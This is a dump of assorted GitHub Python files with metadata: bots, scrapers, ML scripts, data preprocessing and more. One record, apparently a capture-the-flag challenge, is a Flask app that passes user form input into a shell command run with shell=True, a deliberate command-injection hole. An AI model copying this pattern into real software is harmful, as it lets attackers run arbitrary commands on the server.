+{"seq_id": "25132600819", "text": "#!/usr/bin/python3\n\nfrom telegram.ext import Updater, CommandHandler, MessageHandler, Filters\nimport random\nimport os\nfrom model import Model\nimport settings\n\n\nmodel = Model.from_pickles(settings.MODEL_FILE, settings.VECTORIZER_FILE)\n\n\ndef random_word(words):\n if len(words) > 0:\n return words[random.randint(0, len(words) - 1)].lower()\n else:\n return None\n\n\ndef send_meme(update, context):\n if update.message.text is None or update.message.text.startswith('/'):\n return\n update.message.reply_text(model.get_santa_answer(update.message.text))\n\n\ndef send_help(update, context):\n update.message.reply_text('2020 was very hard for Santa too. Tell this bot about your year and he will decide if '\n 'your deserve a present')\n\n\nif __name__ == '__main__':\n updater = Updater(os.environ['TELEGRAM_TOKEN'], use_context=True)\n\n updater.dispatcher.add_handler(CommandHandler('start', send_help))\n updater.dispatcher.add_handler(CommandHandler('help', send_help))\n updater.dispatcher.add_handler(MessageHandler(Filters.all, send_meme))\n\n updater.start_polling()\n updater.idle()\n", "repo_name": "butikov/santas-little-helper", "sub_path": "bot.py", "file_name": "bot.py", "file_ext": "py", "file_size_in_byte": 1149, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "31", "api": [{"api_name": "model.Model.from_pickles", "line_number": 10, "usage_type": "call"}, {"api_name": "model.Model", "line_number": 10, "usage_type": "name"}, {"api_name": "settings.MODEL_FILE", "line_number": 10, "usage_type": "attribute"}, {"api_name": "settings.VECTORIZER_FILE", "line_number": 10, "usage_type": "attribute"}, {"api_name": "random.randint", "line_number": 15, "usage_type": "call"}, {"api_name": "model.get_santa_answer", "line_number": 23, "usage_type": "call"}, {"api_name": "telegram.ext.Updater", "line_number": 32, "usage_type": "call"}, {"api_name": "os.environ", "line_number": 32, "usage_type": "attribute"}, {"api_name": "telegram.ext.CommandHandler", "line_number": 34, "usage_type": "call"}, {"api_name": "telegram.ext.CommandHandler", "line_number": 35, "usage_type": "call"}, {"api_name": "telegram.ext.MessageHandler", "line_number": 36, "usage_type": "call"}, {"api_name": "telegram.ext.Filters.all", "line_number": 36, "usage_type": "attribute"}, {"api_name": "telegram.ext.Filters", "line_number": 36, "usage_type": "name"}]}
+{"seq_id": "31633058276", "text": "#!/usr/bin/env python\n\nimport logging\nimport json\nimport paho.mqtt.client as mqtt\n\nfrom wetware.worker import Worker\nfrom wetware.worker import ApolloConnection\n\nfrom wetware.neuron import Statements\n\nclass WetwareWorker(Worker):\n\n def __init__(self, subclass_section):\n super(WetwareWorker, self).__init__(subclass_section)\n\n self.mqtt_client = mqtt.Client()\n self.mqtt_client.on_connect = self.mqtt_on_connect\n self.mqtt_client.on_message = self.mqtt_on_message\n\n def mqtt_run(self):\n self.mqtt_client.connect(self.args['mqtt_host'], self.args['mqtt_port'])\n self.mqtt_client.loop_forever()\n\n def run(self):\n with ApolloConnection(self.args) as self.apollo_conn:\n self.mqtt_run()\n\n def mqtt_on_connect(self, client, userdata, flags, rc):\n self.mqtt_client.subscribe(\"global/#\")\n\n def mqtt_on_message(self, client, userdata, message):\n if (message.topic.endswith(\"/gps\")):\n self.parse_gps_data(json.loads(message.payload))\n elif (message.topic.endswith(\"/sensortag\")):\n self.parse_sensortag_data(json.loads(message.payload))\n elif (message.topic.endswith(\"/grove\")):\n self.parse_grove_data(json.loads(message.payload))\n\n def parse_gps_data(self, message):\n node = message['clientname']\n lat = message['latitude']\n lon = message['longitude']\n #lists get converted to Geoshapes by Neuron\n lat_lon = [lat, lon]\n logging.info(\"{0}: location: {1}\".format(node, lat_lon))\n statements = Statements()\n statements.add_vertex_property(node, \"location\", lat_lon)\n self.publish(statements)\n\n def parse_sensortag_data(self, message):\n \"\"\"Lots of data here, but let's just get the temperature\n \"\"\"\n node = message['clientname']\n ir_temp = message['ir_temp']\n ambient_temp = ir_temp['ambient_temp']\n target_temp = ir_temp['target_temp']\n logging.info(\"{0}: ambient_temp: {1}, target_temp: {2}\".format(node, ambient_temp, target_temp))\n statements = Statements()\n statements.add_vertex_property(node, \"ambient_temp\", ambient_temp)\n statements.add_vertex_property(node, \"target_temp\", target_temp)\n self.publish(statements)\n\n def parse_grove_data(self, message):\n \"\"\"This is the alcohol sensor\n \"\"\"\n node = message['clientname']\n sensors = message['sensors']\n for sensor in sensors:\n if sensor['name'] == \"Alcohol\":\n alcohol = sensor['value']\n break\n if alcohol:\n logging.info(\"{0}: alcohol: {1}\".format(node, alcohol))\n statements = Statements()\n statements.add_vertex_property(node, \"alcohol\", alcohol)\n self.publish(statements)\n\ndef main():\n logging.basicConfig(level=logging.INFO)\n wetware_worker = WetwareWorker(\"wetware\")\n wetware_worker.run()\n\nif __name__ == \"__main__\":\n main()\n", "repo_name": "dahanks/cortex", "sub_path": "wetware-py/modules/ngfr-sensors/ngfr-sensors-vanilla.py", "file_name": "ngfr-sensors-vanilla.py", "file_ext": "py", "file_size_in_byte": 2994, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "31", "api": [{"api_name": "wetware.worker.Worker", "line_number": 12, "usage_type": "name"}, {"api_name": "paho.mqtt.client.Client", "line_number": 17, "usage_type": "call"}, {"api_name": "paho.mqtt.client", "line_number": 17, "usage_type": "name"}, {"api_name": "wetware.worker.ApolloConnection", "line_number": 26, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 34, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 36, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 38, 
"usage_type": "call"}, {"api_name": "logging.info", "line_number": 46, "usage_type": "call"}, {"api_name": "wetware.neuron.Statements", "line_number": 47, "usage_type": "call"}, {"api_name": "logging.info", "line_number": 58, "usage_type": "call"}, {"api_name": "wetware.neuron.Statements", "line_number": 59, "usage_type": "call"}, {"api_name": "logging.info", "line_number": 74, "usage_type": "call"}, {"api_name": "wetware.neuron.Statements", "line_number": 75, "usage_type": "call"}, {"api_name": "logging.basicConfig", "line_number": 80, "usage_type": "call"}, {"api_name": "logging.INFO", "line_number": 80, "usage_type": "attribute"}]}
+{"seq_id": "22559196175", "text": "from flask import Flask, jsonify, request, render_template \nimport sqlite3\nimport json\nimport random\n\n\napp = Flask(__name__) \n\n@app.route('/test',methods=['POST'])\ndef test():\n if request.method == 'POST':\n user = request.get_json(force=True)\n print(user)\n print('success')\n return 'success'\nif __name__ == '__main__': \n app.run(debug = True) ", "repo_name": "KushGrandhi/Polaroid", "sub_path": "ML/MozoHack/backapi/api.py", "file_name": "api.py", "file_ext": "py", "file_size_in_byte": 373, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 4, "dataset": "github-code", "pt": "31", "api": [{"api_name": "flask.Flask", "line_number": 7, "usage_type": "call"}, {"api_name": "flask.request.method", "line_number": 11, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 11, "usage_type": "name"}, {"api_name": "flask.request.get_json", "line_number": 12, "usage_type": "call"}, {"api_name": "flask.request", "line_number": 12, "usage_type": "name"}]}
+{"seq_id": "20540843467", "text": "from scrapy.spider import BaseSpider\nfrom scrapy.selector import HtmlXPathSelector\nfrom scrapy.http import Request\nfrom scrapy.utils.url import urljoin_rfc\nfrom scrapy.utils.response import get_base_url\n\nfrom product_spiders.utils import extract_price_eu\nfrom product_spiders.items import Product, ProductLoaderWithNameStrip as ProductLoader\n\nclass HomeenterSpider(BaseSpider):\n name = 'homeenter.com'\n allowed_domains = ['homeenter.com']\n start_urls = ['http://www.homeenter.com/33131/']\n\n def parse(self, response):\n hxs = HtmlXPathSelector(response)\n base_url = get_base_url(response)\n\n categories = hxs.select('//*[@class=\"mainarea\"]//div/a[contains(text(), \"Se fler\")]')\n for cat in categories:\n yield Request(urljoin_rfc(base_url, cat.select('@href').extract()[0]),\n callback=self.parse_pages,\n meta={'category': cat.select('text()').re(r'Se fler (.*)')[0].replace('>>>', '').strip()})\n\n def parse_pages(self, response):\n hxs = HtmlXPathSelector(response)\n\n for product in hxs.select('//a/img[@class=\"PIWC\"]/../@href').extract():\n yield Request(urljoin_rfc(get_base_url(response), product), callback=self.parse_product, meta=response.meta)\n\n def parse_product(self, response):\n import re\n hxs = HtmlXPathSelector(response)\n loader = ProductLoader(item=Product(), selector=hxs)\n\n loader.add_value('identifier', [x for x in response.url.split('?')[0].split('/') if x][-1])\n loader.add_value('url', response.url)\n loader.add_xpath('name', '//h1/text()')\n sku = ''.join(hxs.select('//h1/text()').extract())\n try:\n loader.add_value('sku', re.search('(\\d{3}\\d*)', sku).groups()[0])\n except:\n self.log('No SKU for %s' % (response.url))\n loader.add_value('price', extract_price_eu(hxs.select('//b[@class=\"priceFPNormal_special\"]/text()')[0].extract()))\n loader.add_value('category', response.meta.get('category'))\n\n img = hxs.select('//a[@id=\"mbpicturepos0\"]/@href').extract()\n if img:\n loader.add_value('image_url', urljoin_rfc(get_base_url(response), img[0]))\n\n loader.add_value('brand', 'lego')\n# loader.add_value('shipping_cost', '49')\n# loader.add_value('stock', '0')\n\n yield loader.load_item()\n", "repo_name": "Godsoo/scraping", "sub_path": "e-commerce/CompetitorMonitor/product_spiders/spiders/lego_sw/homeenter_com.py", "file_name": "homeenter_com.py", "file_ext": "py", "file_size_in_byte": 2382, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "32", "api": [{"api_name": "scrapy.spider.BaseSpider", "line_number": 10, "usage_type": "name"}, {"api_name": "scrapy.selector.HtmlXPathSelector", "line_number": 16, "usage_type": "call"}, {"api_name": "scrapy.utils.response.get_base_url", "line_number": 17, "usage_type": "call"}, {"api_name": "scrapy.http.Request", "line_number": 21, "usage_type": "call"}, {"api_name": "scrapy.utils.url.urljoin_rfc", "line_number": 21, "usage_type": "call"}, {"api_name": "scrapy.selector.HtmlXPathSelector", "line_number": 26, "usage_type": "call"}, {"api_name": "scrapy.http.Request", "line_number": 29, "usage_type": "call"}, {"api_name": "scrapy.utils.url.urljoin_rfc", "line_number": 29, "usage_type": "call"}, {"api_name": "scrapy.utils.response.get_base_url", "line_number": 29, "usage_type": "call"}, {"api_name": "scrapy.selector.HtmlXPathSelector", "line_number": 33, "usage_type": "call"}, {"api_name": "product_spiders.items.ProductLoaderWithNameStrip", "line_number": 34, "usage_type": "call"}, {"api_name": "product_spiders.items.Product", 
"line_number": 34, "usage_type": "call"}, {"api_name": "re.search", "line_number": 41, "usage_type": "call"}, {"api_name": "product_spiders.utils.extract_price_eu", "line_number": 44, "usage_type": "call"}, {"api_name": "scrapy.utils.url.urljoin_rfc", "line_number": 49, "usage_type": "call"}, {"api_name": "scrapy.utils.response.get_base_url", "line_number": 49, "usage_type": "call"}]}
+{"seq_id": "40398625113", "text": "import subprocess\nfrom flask import Flask, request\n\napp = Flask(__name__)\n\n@app.route('/')\ndef index():\n return '''\n VSauce Quotes \n You can choose from 3 text files which contain VSauce quotes.
\n quote1.txt, quote2.txt, and quote3.txt
\n \n '''\n\n@app.route('/read', methods=['POST'])\ndef read():\n selected_quote = request.form['quote']\n\n linux_command = f'cat quotes/{selected_quote}' # create the linux command to find the specific word(s) in the text provided\n result = subprocess.run(linux_command, stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True) # run the linux command on the server\n\n if result.returncode != 0: # if there was an error when the linux command was executed\n return result.stderr, 500\n \n return result.stdout.decode('utf-8') # return the output of the ran linux command\n\nif __name__ == '__main__':\n app.run(host='0.0.0.0', debug=False)\n", "repo_name": "uocybersec/first-event-challenges", "sub_path": "lvl1/app.py", "file_name": "app.py", "file_ext": "py", "file_size_in_byte": 1110, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "31", "api": [{"api_name": "flask.Flask", "line_number": 4, "usage_type": "call"}, {"api_name": "flask.request.form", "line_number": 20, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 20, "usage_type": "name"}, {"api_name": "subprocess.run", "line_number": 23, "usage_type": "call"}, {"api_name": "subprocess.PIPE", "line_number": 23, "usage_type": "attribute"}]}
+{"seq_id": "20977419600", "text": "from flask import Flask, render_template, request\nimport base64\nimport tensorflow\nimport numpy as np\nimport cv2 \n\ndef resize(image):\n rs = np.zeros((500,500,3),dtype=np.uint8)\n height = image.shape[0]\n width = image.shape[1]\n rs[:height,:width] = image\n new_array = np.expand_dims(rs, axis=0)\n return new_array\n\ndef preprocess_image(image_data):\n # Decode image from bytes and convert it to a NumPy array\n image = cv2.imdecode(np.frombuffer(image_data, np.uint8), cv2.IMREAD_COLOR)\n # Perform any necessary preprocessing (e.g., resizing, normalization)\n image = resize(image)\n return image\n\napp = Flask(__name__)\n\n# # load model\n# model = joblib.load('model/cat_dog.pkl')\n\n@app.route(\"/\")\ndef index():\n return render_template('index.html')\n\n@app.route('/predict', methods=['POST'])\ndef predict():\n if 'image' not in request.files:\n return 'No file part', 400\n\n file = request.files['image']\n \n if file.filename == '':\n return 'No selected file', 400\n \n new_model = tensorflow.keras.models.load_model('model/my_model')\n image_data = file.read()\n rs_image = preprocess_image(image_data)\n pred = new_model.predict(rs_image).argmax()\n \n prediction = \"Dogs\" if pred == 1 else \"Cats\"\n image_data = base64.b64encode(image_data).decode(\"utf-8\")\n return render_template(\"result.html\", prediction=prediction, img = image_data)\n \n\nif __name__ == '__main__':\n app.run(debug=True)\n ", "repo_name": "Quanhcmus/dog-cat-classfication", "sub_path": "app.py", "file_name": "app.py", "file_ext": "py", "file_size_in_byte": 1467, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "31", "api": [{"api_name": "numpy.zeros", "line_number": 8, "usage_type": "call"}, {"api_name": "numpy.uint8", "line_number": 8, "usage_type": "attribute"}, {"api_name": "numpy.expand_dims", "line_number": 12, "usage_type": "call"}, {"api_name": "cv2.imdecode", "line_number": 17, "usage_type": "call"}, {"api_name": "numpy.frombuffer", "line_number": 17, "usage_type": "call"}, {"api_name": "numpy.uint8", "line_number": 17, "usage_type": "attribute"}, {"api_name": "cv2.IMREAD_COLOR", "line_number": 17, "usage_type": "attribute"}, {"api_name": "flask.Flask", "line_number": 22, "usage_type": "call"}, {"api_name": "flask.render_template", "line_number": 29, "usage_type": "call"}, {"api_name": "flask.request.files", "line_number": 33, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 33, "usage_type": "name"}, {"api_name": "flask.request.files", "line_number": 36, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 36, "usage_type": "name"}, {"api_name": "tensorflow.keras.models.load_model", "line_number": 41, "usage_type": "call"}, {"api_name": "tensorflow.keras", "line_number": 41, "usage_type": "attribute"}, {"api_name": "base64.b64encode", "line_number": 47, "usage_type": "call"}, {"api_name": "flask.render_template", "line_number": 48, "usage_type": "call"}]}
+{"seq_id": "32740891907", "text": "import torch\nfrom KalmanNet_sysmdl import SystemModel\nfrom Pipeline_EKF import Pipeline_EKF\nfrom KalmanNet_nn import KalmanNetNN\nfrom model import f, h_full, h_partial, h_nonlinear\nimport datetime\nfrom datetime import date\nimport numpy as np\nimport os\n\nif torch.cuda.is_available():\n dev = torch.device(\"cuda:0\") # you can continue going on here, like cuda:1 cuda:2....etc.\n torch.set_default_tensor_type('torch.cuda.FloatTensor')\n print(\"Running on the GPU\")\nelse:\n dev = torch.device(\"cpu\")\n print(\"Running on the CPU\")\n\nROOT_PATH = \"/content/drive/MyDrive/KalmanNet_Visual/KalmanNet_VO/\"\nROOT_PATH = r\"C:\\Users\\damis\\KalmanNetDrive\\KalmanNet_Visual\\KalmanNet_VO/\"\ntorch.manual_seed(42)\n\nv = 0\nq2 = 1\nr2 = 1\nm = 2\nn = 2\nh = h_full\nT = 400\nT_test = 400\nm1x_0 = torch.Tensor([[0.0], [0.0]]).to(dev)\nm2x_0 = torch.eye(m).to(dev)\nEPOCHS = 20\nBATCH_SIZE = 10\nLR = 1e-3\nWD = 1e-4\n\ntoday = date.today()\nnow = datetime.datetime.now()\nstrToday = today.strftime(\"%m.%d.%y\")\nstrNow = now.strftime(\"%H:%M:%S\")\nstrTime = strToday + \"_\" + strNow\nprint(\"Current Time =\", strTime)\n\n\nQ_true = q2 * torch.eye(m)\nR_true = r2 * torch.eye(n)\nsys_model = SystemModel(f, Q_true, h, R_true, T, T_test)\nsys_model.InitSequence(m1x_0, m2x_0)\n\n\nq = np.sqrt(q2)\nr = np.sqrt(r2)\ninput_ = np.load(ROOT_PATH+f\"Datasets/Pendulum/decimated_noisy_data/pendulum_decimated_noisy_q2_{q2:.0e}_r2_{r2:.0e}_v{v}.npz\")\ntarget_ = np.load(ROOT_PATH+f\"Datasets/Pendulum/decimated_clean_data/pendulum_decimated_q2_{q2:.0e}_v_{v}.npz\")\ntrain_input = torch.from_numpy(input_[\"training_set\"][:100, :, :]).float().to(dev)\ntrain_target = torch.from_numpy(target_[\"training_set\"][:100, :, :]).float().to(dev)\ntest_input = torch.from_numpy(input_[\"test_set\"][:, :, :]).float().to(dev)\ntest_target = torch.from_numpy(target_[\"test_set\"]).float().to(dev)\ncv_input = torch.from_numpy(input_[\"validation_set\"][:100, :, :]).float().to(dev)\ncv_target = torch.from_numpy(target_[\"validation_set\"][:100, ...]).float().to(dev)\nprint(train_input.shape, train_target.shape, cv_input.shape, cv_target.shape)\n\n\n\n\nmodelFolder = ROOT_PATH + \"Simulations_results/Pendulum/KalmanNet\"\nos.makedirs(modelFolder, exist_ok=True)\nKNet_Pipeline = Pipeline_EKF(strTime, modelFolder, \"KNet_vectorial\")\nKNet_Pipeline.setssModel(sys_model)\nKNet_model = KalmanNetNN()\nKNet_model.Build(sys_model)\nKNet_Pipeline.setModel(KNet_model)\nKNet_Pipeline.setTrainingParams(n_Epochs=EPOCHS, n_Batch=BATCH_SIZE, learningRate=LR, weightDecay=WD)\n\n# KNet_Pipeline.model = torch.load(modelFolder+\"model_KNet.pt\")\n\"\"\"\nKNet_Pipeline.NNTrain(train_input, train_target, cv_input, cv_target)\n[KNet_MSE_test_linear_arr, KNet_MSE_test_linear_avg, KNet_MSE_test_dB_avg, KNet_test] = KNet_Pipeline.NNTest(test_input, test_target)\nKNet_Pipeline.save()\nnp.savez(modelFolder+f\"result_{q2:.0e}_{r2:.0e}_v{v}.npz\", MSE_linear_arr = KNet_MSE_test_linear_arr.cpu(), MSE_linear_avg=KNet_MSE_test_linear_avg.cpu(),\n MSE_dB_avg=KNet_MSE_test_dB_avg.cpu(), output=KNet_test.cpu())\n\"\"\"\nKNet_Pipeline.model.InitSequence(KNet_Pipeline.ssModel.m1x_0, KNet_Pipeline.ssModel.T)\n\ninput = train_input[0, :, :]\nout = KNet_Pipeline.model(input[:, 6])\nprint(out)\nprint(out.shape)", "repo_name": "stegerd/KalmanNet_with_visual_observation", "sub_path": "KNet_original_code/prova.py", "file_name": "prova.py", "file_ext": "py", "file_size_in_byte": 3172, "program_lang": "python", "lang": "en", 
"doc_type": "code", "dataset": "github-code", "pt": "31", "api": [{"api_name": "torch.cuda.is_available", "line_number": 11, "usage_type": "call"}, {"api_name": "torch.cuda", "line_number": 11, "usage_type": "attribute"}, {"api_name": "torch.device", "line_number": 12, "usage_type": "call"}, {"api_name": "torch.set_default_tensor_type", "line_number": 13, "usage_type": "call"}, {"api_name": "torch.device", "line_number": 16, "usage_type": "call"}, {"api_name": "torch.manual_seed", "line_number": 21, "usage_type": "call"}, {"api_name": "model.h_full", "line_number": 28, "usage_type": "name"}, {"api_name": "torch.Tensor", "line_number": 31, "usage_type": "call"}, {"api_name": "torch.eye", "line_number": 32, "usage_type": "call"}, {"api_name": "datetime.date.today", "line_number": 38, "usage_type": "call"}, {"api_name": "datetime.date", "line_number": 38, "usage_type": "name"}, {"api_name": "datetime.datetime.now", "line_number": 39, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 39, "usage_type": "attribute"}, {"api_name": "torch.eye", "line_number": 46, "usage_type": "call"}, {"api_name": "torch.eye", "line_number": 47, "usage_type": "call"}, {"api_name": "KalmanNet_sysmdl.SystemModel", "line_number": 48, "usage_type": "call"}, {"api_name": "model.f", "line_number": 48, "usage_type": "argument"}, {"api_name": "numpy.sqrt", "line_number": 52, "usage_type": "call"}, {"api_name": "numpy.sqrt", "line_number": 53, "usage_type": "call"}, {"api_name": "numpy.load", "line_number": 54, "usage_type": "call"}, {"api_name": "numpy.load", "line_number": 55, "usage_type": "call"}, {"api_name": "torch.from_numpy", "line_number": 56, "usage_type": "call"}, {"api_name": "torch.from_numpy", "line_number": 57, "usage_type": "call"}, {"api_name": "torch.from_numpy", "line_number": 58, "usage_type": "call"}, {"api_name": "torch.from_numpy", "line_number": 59, "usage_type": "call"}, {"api_name": "torch.from_numpy", "line_number": 60, "usage_type": "call"}, {"api_name": "torch.from_numpy", "line_number": 61, "usage_type": "call"}, {"api_name": "os.makedirs", "line_number": 68, "usage_type": "call"}, {"api_name": "Pipeline_EKF.Pipeline_EKF", "line_number": 69, "usage_type": "call"}, {"api_name": "KalmanNet_nn.KalmanNetNN", "line_number": 71, "usage_type": "call"}]}
+{"seq_id": "5115971710", "text": "# -*- coding: UTF-8 -*-\r\n# 批量显示指定位置图片的尺寸以及物理尺寸\r\n\r\nimport os\r\n#导入Pillow的Image类\r\nfrom PIL import Image\r\n\r\n#指定图片位置,形如:C:\\Users\\xxx\\Pictures\r\nimgdir = input(\"请输入图片文件夹地址:\")\r\nallfiles = os.listdir(imgdir)\r\n#用filter()函数过滤仅保留图片格式文件,留下的进入列表\r\ndef file_filter(f):\r\n if f[-4:] in ['.jpg','.png','.bmp']:\r\n return True\r\n else:\r\n return False\r\nimages = list(filter(file_filter,allfiles))\r\n\r\n#用for循环,依次打开所有图片文件夹路径的图片\r\nfor img in images:\r\n #输入的路径+图片文件名得到实际图片路径\r\n imgopen = Image.open(imgdir +\"\\\\\"+ img)\r\n #用max()和min()函数分别获得图片长边和短边大小\r\n lpx = max(imgopen.size)\r\n spx = min(imgopen.size)\r\n #用pillow内置的info获取图片dpi信息,因部分图片不含有dpi,所以先判断是否含有dpi\r\n #dict内置的get()方法,如果key存在,则返回其value,否则返回None\r\n if imgopen.info.get('dpi') != None:\r\n #获取dpi\r\n dpi = max(imgopen.info.get('dpi'))\r\n #厘米和像素转换公式为 px/dpi*2.54,用round函数保留两位小数\r\n lcm = round(lpx/dpi*2.54,2)\r\n scm = round(spx/dpi*2.54,2)\r\n print(img,str(lpx)+\"X\"+str(spx)+\"px\",str(dpi)+\"dpi\"+\" 物理尺寸:\"+str(lcm)+\"X\"+str(scm)+\"cm\")\r\n else:\r\n print(img,str(lpx)+\"X\"+str(spx)+\"px\")\r\n \r\n \r\n", "repo_name": "sxmcody/Bulk-Show-Imagesize", "sub_path": "imageview.py", "file_name": "imageview.py", "file_ext": "py", "file_size_in_byte": 1490, "program_lang": "python", "lang": "zh", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "31", "api": [{"api_name": "os.listdir", "line_number": 10, "usage_type": "call"}, {"api_name": "PIL.Image.open", "line_number": 22, "usage_type": "call"}, {"api_name": "PIL.Image", "line_number": 22, "usage_type": "name"}]}
+{"seq_id": "16780492452", "text": "#!/usr/bin/python\n# -*- coding: utf-8 -*-\n\nimport pickle, re\n\nimport numpy as np\n\nimport hangulvars, utils\n\nBASE_CODE = hangulvars.BASE_CODE\nCHOSUNG = hangulvars.CHOSUNG\nJUNGSUNG = hangulvars.JUNGSUNG\nNONHANGUL_LIST = hangulvars.NONHANGUL_LIST\nCHOSUNG_LIST = hangulvars.CHOSUNG_LIST\nJUNGSUNG_LIST = hangulvars.JUNGSUNG_LIST\nJONGSUNG_LIST = hangulvars.JONGSUNG_LIST\n\ndef generate_arr_index_target(sen_labelled):\n\tarr_index_target = []\n\tpadding = 0\n\tidx_searched = 0\n\twhile True:\n\t\ttry:\n\t\t\tidx0 = sen_labelled.index(\"<\", idx_searched)\n\t\t\tidx1 = sen_labelled.index(\">\", idx_searched)\n\t\t\tlabel = sen_labelled[idx0:idx1].split(\":\")[1]\n\t\t\t\n\t\t\tarr_index_target.append([idx0 - padding, idx1 - padding - 2 - len(label), label])\n\t\t\t\n\t\t\tidx_searched = idx1 + 1\n\t\t\tpadding += 3 + len(label)\n\t\texcept ValueError:\n\t\t\tbreak\n\n\treturn arr_index_target\n\ndef reformat_data(fpath_data_original):\n\twith open(fpath_data_original) as fo:\n\t\tarr_rec = []\n\t\tline = fo.readline()\n\t\twhile len(line) > 0:\n\t\t\tif line[0] in [\";\",\"$\"]: arr_rec.append(line)\n\t\t\tline = fo.readline()\n\n\t\t# print(range(len(arr_rec), 2))\n\t\tarr_rec_a = []\n\t\tfor i in range(0, len(arr_rec), 2):\n\t\t\tx1 = arr_rec[i][2:].strip()\n\t\t\tx2 = arr_rec[i+1][1:].strip()\n\t\t\tif \"<\" not in x1: arr_rec_a.append([x1,x2])\n\n\t\treturn arr_rec_a\n\t\t# return (count, max(arr_len_seq))\n\ndef write_data_ready(arr_rec_a, fpath_data_ready):\n\tstr_fwrite = \"\"\n\tarr_len_seq = []\n\tcount = 0\n\t\n\tfor rec in arr_rec_a:\n\t\tsen_raw, sen_labelled = rec[0], rec[1]\n\t\t# print(sen_raw, sen_labelled)\n\t\tsen_raw = re.sub(r\"([A-Z])\", \"U\", sen_raw) # Uppercase letters\n\t\tsen_raw = re.sub(r\"([a-z])\", \"L\", sen_raw) # Lowercase letters\n\t\tsen_raw = re.sub(r\"([\\u4e00-\\u9fff])\", \"H\", sen_raw) # Hanja\n\t\tsen_raw = re.sub(r\"([0-9])\", \"D\", sen_raw) # Digits\n\t\tsen_raw = re.sub(r\" \", \"S\", sen_raw) # Whitespace\n\t\t# sen_raw = \"B\" + sen_raw + \"E\"\n\t\t# print(sen_raw)\n\n\t\tarr_index_target = generate_arr_index_target(sen_labelled)\n\t\tfor index_target in arr_index_target:\n\t\t\tstr_fwrite = \"{0}{1};{2};{3};{4}\\n\".format(str_fwrite, sen_raw, index_target[0], index_target[1], index_target[2])\n\t\t\t# print(sen_raw[index_target[0]:index_target[1]], index_target[2])\n\t\t\tarr_len_seq.append(len(sen_raw))\n\t\t\n\t\t\tcount += 1\n\t\t# line = fo.readline()\n\tshape_data = (count, max(arr_len_seq))\n\treturn shape_data, str_fwrite\n\n\ndef digitize_data(fpath, shape_data):\n\tarr_label = ['TI', 'OG', 'PS', 'LC', 'DT']\n\twith open(fpath, \"r\", encoding=\"utf-8\") as fo:\t\t\n\t\tdata = np.zeros(shape=(shape_data[0], shape_data[1]*(3+1) + 5), dtype=np.int32)\n\t\tfor i in range(shape_data[0]):\n\t\t\tline = fo.readline()\n\t\t\tsen_raw = line.split(\";\")[0]\n\n\t\t\t# print(sen_raw)\n\n\t\t\t# Input row\n\t\t\tseq_digitized = []\n\t\t\tfor x in sen_raw: seq_digitized += utils.decompose_syllable(x)\n\t\t\tseq_digitized = np.asarray(seq_digitized, dtype=np.int32)\n\t\t\tzero_filler = np.zeros(shape=(shape_data[1]*3 - seq_digitized.shape[0]))\n\t\t\tX = np.hstack([seq_digitized, zero_filler])\n\n\t\t\t# Clipper\n\t\t\tzeros0 = np.zeros(shape=int(line.split(\";\")[1]))\n\t\t\tones = np.ones(shape=int(line.split(\";\")[2]) - int(line.split(\";\")[1]))\n\t\t\tzeros1 = np.zeros(shape=shape_data[1]- int(line.split(\";\")[2]))\n\t\t\tclipper = np.hstack([zeros0, ones, zeros1])\n\t\t\t\n\t\t\t# 
Label\n\t\t\tlabel_onehot = [0 for i in range(len(arr_label))]\n\t\t\tlabel_onehot[arr_label.index(line.split(\";\")[3].strip())] = 1\n\t\t\tlabel_onehot = np.asarray(label_onehot, dtype=np.int32)\n\n\t\t\trecord = np.hstack([X, clipper, label_onehot])\n\t\t\tdata[i] = record\n\treturn data\n\nfpath_data_original = \"../../dev-data/sylner/2016klpNER.base_train\"\nfpath_data_raw = \"../../dev-data/sylner/base_train_modified.csv\"\nfpath_data_ready = \"../../dev-data/sylner/base_train_ready.csv\"\nfpath_pickle = \"../../dev-data/sylner/base_train.pickle\"\n\narr_rec = reformat_data(fpath_data_original)\nshape_data, str_fwrite = write_data_ready(arr_rec, fpath_data_ready)\n\nwith open(fpath_data_ready, \"w\", encoding=\"utf-8\") as fo:\n\tfo.write(str_fwrite)\n\ndata = digitize_data(fpath_data_ready, shape_data)\nprint(data.shape)\nutils.write_pickle(data, fpath_pickle)", "repo_name": "sanghunkang/sylner", "sub_path": "preprocess.py", "file_name": "preprocess.py", "file_ext": "py", "file_size_in_byte": 3999, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "31", "api": [{"api_name": "hangulvars.BASE_CODE", "line_number": 10, "usage_type": "attribute"}, {"api_name": "hangulvars.CHOSUNG", "line_number": 11, "usage_type": "attribute"}, {"api_name": "hangulvars.JUNGSUNG", "line_number": 12, "usage_type": "attribute"}, {"api_name": "hangulvars.NONHANGUL_LIST", "line_number": 13, "usage_type": "attribute"}, {"api_name": "hangulvars.CHOSUNG_LIST", "line_number": 14, "usage_type": "attribute"}, {"api_name": "hangulvars.JUNGSUNG_LIST", "line_number": 15, "usage_type": "attribute"}, {"api_name": "hangulvars.JONGSUNG_LIST", "line_number": 16, "usage_type": "attribute"}, {"api_name": "re.sub", "line_number": 63, "usage_type": "call"}, {"api_name": "re.sub", "line_number": 64, "usage_type": "call"}, {"api_name": "re.sub", "line_number": 65, "usage_type": "call"}, {"api_name": "re.sub", "line_number": 66, "usage_type": "call"}, {"api_name": "re.sub", "line_number": 67, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 86, "usage_type": "call"}, {"api_name": "numpy.int32", "line_number": 86, "usage_type": "attribute"}, {"api_name": "utils.decompose_syllable", "line_number": 95, "usage_type": "call"}, {"api_name": "numpy.asarray", "line_number": 96, 